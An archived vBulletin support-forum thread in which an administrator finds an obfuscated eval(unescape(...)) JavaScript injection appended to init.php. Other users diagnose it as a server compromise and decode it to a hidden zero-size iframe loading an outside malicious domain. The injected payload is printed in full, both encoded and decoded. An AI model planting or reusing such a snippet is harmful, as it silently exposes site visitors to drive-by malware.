View Full Version : Unable to add cookies, header already sent
Guest210312
04-12-2008, 03:12 PM
Unable to add cookies, header already sent.
File: /mounted-storage/home59c/sub001/sc37219-RPSA/www/forum/includes/init.php
Line: 466
Error im getting.
Im the super administrator on my forums and cannot login to the vbulletin forums. I have made no changes or installed any new hacks or plugins for a few months. ANd i cant login to disable anything (but do have root and FTP access)
What should i do?
Lynne
04-12-2008, 03:59 PM
Have you tried deleting your cookies for the site?
Guest210312
04-12-2008, 08:21 PM
Yes and nothing happened.
EDIT:
Right ive found out the reason for this. I found this at the end of my init.php (no idea what it is)
?><!-- ~ --><script type="text/javascript">
eval(unescape("%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%27%5 C%75%30%30%33%63%5C%75%30%30%36%39%5C%75%30%30%36% 36%5C%75%30%30%37%32%5C%75%30%30%36%31%5C%75%30%30 %36%64%5C%75%30%30%36%35%5C%75%30%30%32%30%5C%75%3 0%30%37%33%5C%75%30%30%37%32%5C%75%30%30%36%33%5C% 75%30%30%33%64%5C%75%30%30%32%32%5C%75%30%30%36%38 %5C%75%30%30%37%34%5C%75%30%30%37%34%5C%75%30%30%3 7%30%5C%75%30%30%33%61%5C%75%30%30%32%66%5C%75%30% 30%32%66%5C%75%30%30%36%66%5C%75%30%30%37%32%5C%75 %30%30%36%35%5C%75%30%30%36%65%5C%75%30%30%37%34%5 C%75%30%30%37%32%5C%75%30%30%36%31%5C%75%30%30%36% 36%5C%75%30%30%36%36%5C%75%30%30%32%65%5C%75%30%30 %36%33%5C%75%30%30%36%65%5C%75%30%30%32%66%5C%75%3 0%30%36%39%5C%75%30%30%36%65%5C%75%30%30%32%65%5C% 75%30%30%36%33%5C%75%30%30%36%37%5C%75%30%30%36%39 %5C%75%30%30%33%66%5C%75%30%30%33%35%5C%75%30%30%3 2%32%5C%75%30%30%32%30%5C%75%30%30%37%37%5C%75%30% 30%36%39%5C%75%30%30%36%34%5C%75%30%30%37%34%5C%75 %30%30%36%38%5C%75%30%30%33%64%5C%75%30%30%32%32%5 C%75%30%30%33%30%5C%75%30%30%32%32%5C%75%30%30%32% 30%5C%75%30%30%36%38%5C%75%30%30%36%35%5C%75%30%30 %36%39%5C%75%30%30%36%37%5C%75%30%30%36%38%5C%75%3 0%30%37%34%5C%75%30%30%33%64%5C%75%30%30%32%32%5C% 75%30%30%33%30%5C%75%30%30%32%32%5C%75%30%30%32%30 %5C%75%30%30%37%33%5C%75%30%30%37%34%5C%75%30%30%3 7%39%5C%75%30%30%36%63%5C%75%30%30%36%35%5C%75%30% 30%33%64%5C%75%30%30%32%32%5C%75%30%30%36%34%5C%75 %30%30%36%39%5C%75%30%30%37%33%5C%75%30%30%37%30%5 C%75%30%30%36%63%5C%75%30%30%36%31%5C%75%30%30%37% 39%5C%75%30%30%33%61%5C%75%30%30%36%65%5C%75%30%30 %36%66%5C%75%30%30%36%65%5C%75%30%30%36%35%5C%75%3 0%30%32%32%5C%75%30%30%33%65%5C%75%30%30%33%63%5C% 75%30%30%32%66%5C%75%30%30%36%39%5C%75%30%30%36%36 %5C%75%30%30%37%32%5C%75%30%30%36%31%5C%75%30%30%3 6%64%5C%75%30%30%36%35%5C%75%30%30%33%65%27%29%3B"));
</script><!-- ~ -->
And i deleted it. Feel free to lock this. All is working
Marco van Herwaarden
04-13-2008, 09:55 AM
Now that would really scare me. it means that someone has access to the files on your server. There is no way to tell if any other files are compromised, unless you do a very thorough investigation. Please contact your host regarding this and ensure that this hole is closed ASAP.
Guest210312
04-13-2008, 01:45 PM
Would anyone be able to tell what this script actually does?
Lynne
04-13-2008, 01:53 PM
I can't tell you exactly what it says, but take a look at this post (https://vborg.vbsupport.ru/showpost.php?p=1488816&postcount=11) where I list the source code for an email javascript obfuscator. You code is very similar.
Dismounted
04-14-2008, 06:42 AM
It is heavily obfuscated code. There is one layer of hex encoding, one layer of Unicode escaping. It equates to:
<iframe src="http://orentraff.cn/in.cgi?5" width="0" height="0" style="display:none"></iframe>
vBulletin® v3.8.12 by vBS, Copyright ©2000-2025, vBulletin Solutions Inc.